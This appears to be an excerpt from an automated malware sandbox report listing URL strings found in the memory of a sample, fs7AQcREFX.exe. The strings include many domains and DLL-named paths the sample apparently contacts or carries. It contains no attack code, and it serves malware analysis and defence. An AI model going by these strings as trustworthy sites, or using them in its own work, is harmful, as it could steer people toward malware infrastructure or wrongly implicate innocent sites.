                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/(
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/TT
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/i
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391362964.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391488204.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/99T
                      Source: fs7AQcREFX.exe, 00000000.00000003.391362964.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391488204.00000000061B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/E&
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/e
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/oK
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/~
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsag.info
                      Source: fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503638672.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504279625.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/h.dll1
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/h.dll=
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/ll
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/s
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/sZh
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/zional.dtd
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/q
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/e
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.00000000061DE000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/563209-4053062332-1002
                      Source: fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/zK
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/JQr
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/~-
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/g17
                      Source: fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/sK
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/I
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/2S
                      Source: fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/L
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/q
                      Source: fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/rsaenh.dll8
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/VP1
                      Source: fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/v1.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tk.gov.tr/Duzenlemeler/Hukuki/yonetmelikler/Kisisel_Bil_Yon_06_02_04.pdf
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                      Source: fs7AQcREFX.exe, 00000000.00000003.511767622.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393913083.00000000061A5000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.00000000061A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/T3J
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/h.dll
                      Source: fs7AQcREFX.exe, 00000000.00000003.393913083.00000000061A5000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.502259828.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.00000000061A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/j
                      Source: fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/$
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/m8
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/B
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/j
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/I
                      Source: fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/N
                      Source: fs7AQcREFX.exe, 00000000.00000003.505979031.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/saenh.dll
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/172-appartement-a-vendre-lille-30534
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/174-appartement-a-vendre-grenoble-30514
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
